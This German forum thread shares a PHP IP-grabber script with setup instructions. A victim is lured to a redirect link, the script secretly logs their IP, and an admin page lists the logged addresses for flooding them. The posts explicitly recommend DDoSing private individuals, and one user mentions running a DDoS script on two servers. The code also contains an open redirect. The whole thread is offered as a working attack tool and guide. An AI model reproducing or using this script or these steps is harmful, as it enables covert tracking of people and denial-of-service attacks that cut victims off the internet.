[V] Ddose-Script

[Floo]

Nach meinem MSN-Freezerscript veröffentliche ich nun auch ein selbstgebasteltes Script, mitdem ihr an IPs kommt, ohne, dass das Opfer etwas davon erfährt und ihr danach das Vic ddosen könnt auf Knopfdruck.

Vorraussetzung:
- 4 KB Webspace
- 1 SQL-Datenbank

<?php

$database_name = ''; // DB-Name
$db_host = ''; // Host
$db_username = ''; // Username
$db_password = ''; // Passwort


function db_query($q)
{
global $_query_cnt;

$r = mysql_query($q);
$_query_cnt++;
if(mysql_error() != '')
{
die('<tt>'.$q.'</tt>
caused an error:
'.mysql_error());
}
return $r;
}

function dbname($srvid = -1)
{
global $database_prefix, $database_suffix, $enable_multi_server_support, $database_name;
if( $enable_multi_server_support )
{
return $database_prefix . $srvid . $database_suffix;
}
else
{
return $database_name;
}
}

function db_select($name)
{
$r = mysql_select_db($name);
if(mysql_error() != '' || $r == false)
{
die('Fehler beim Auswaehlen der DB:
'.mysql_error());
}
return $r;
}


@mysql_connect($db_host, $db_username, $db_password);
@mysql_select_db($database_name);

if($_GET['m']!="admin"){
db_query('INSERT INTO ip SET ip = \''.$_SERVER['REMOTE_ADDR'].'\' , time=\''.time().'\'');
header('Location:'.$_GET['target'].'');
}

if($_GET['m']=="admin"){
$a = db_query('SELECT * FROM ip');
while($b=mysql_fetch_assoc($a)){

echo'

'.$b['ip'].' um '.date("d.m.y G:i", $b['time']).'';
}

}

?>

So gehts:

1. Datenbank erstellen und Zugangsdaten einsetzen (siehe fettdruck)
2. Dem Vic den link www.deinhost.de/script.php?target=URLADRESSE unterjubeln.
Statt URLADRESSE eine Homepageadresse (mit http://www.) wählen.
3. Das Vic geht auf den Link und kommt ganz normal auf die URLADRESSE, die ihr angegeben habt
4. Ihr selber geht auf www.deinhost.de/script.php?m=admin
5. Ihr wählt die IP-Adresse vom Vic (Zeitangabe ist dabei) und klickt auf die IP-Adresse drauf
6. Das Vic wird geflooded

Und für die SQL-Tabelle:

CREATE TABLE `ip` (
`ip` varchar(20) NOT NULL,
`time` varchar(20) NOT NULL
) ENGINE=MyISAM DEFAULT CHARSET=latin1;

Fragen bitte untendrunter.
Demo: http://floo.myconfixx.info/ip.php

[JambaRatte]

Code:

CREATE TABLE `ip` (
`ip` varchar(20) NOT NULL,
`time` varchar(20) NOT NULL
) ENGINE=MyISAM DEFAULT CHARSET=latin1;

time muss int sein
eine ip hat maximal 15 chars

Code:

db_query('INSERT INTO ip SET ip = \''.$_SERVER['REMOTE_ADDR'].'\' , time=\''.time().'\'');

time danach ohne anführungszeichen

Dann ists besser

[Floo]

Beide Versionen sind funktionstüchtig.
Deine ist sicherlich "stilvoller" aber nunja :>

[X21]

Is zwar schon etwas älter, aber ich hab gehört, dass Webmedia Ip's logt.
Is das richtig? Bzw. sollte man die Angelegenheit mim Proxy machen?

[Floo]

Du kannst dir selber solche Programme auf den FTP laden, der alle Zugriffe loggt - Daher von Anbieter zu Anbieter unterschiedlich.
Und nen ganzen Server zu flooden - Wird schwierig
Du hast höchstens ne 16000 Leitung und die Serverfarmen ne 100Mbitleitung.
Daher: Ddose lieber Privatpersonen

Btw kenne ich nicht Webmedia... Serveranbieter?Internetanbieter?

[X21]

http://now-webmedia.net/src/func/user_scr.php?target='

Das war gemeint :p

[Floo]

Achso
Kannst ja auch nen anderes Ddose-Script benutzen - Hauptaufgabe von meinem ist es ja die IP vom Opfer zu bekommen.

[X21]

Jo hab auf 2 Servern das php ddos script auch laufen^^ hat mich nurmal interessiert ob das Gerücht stimmt. :twisted: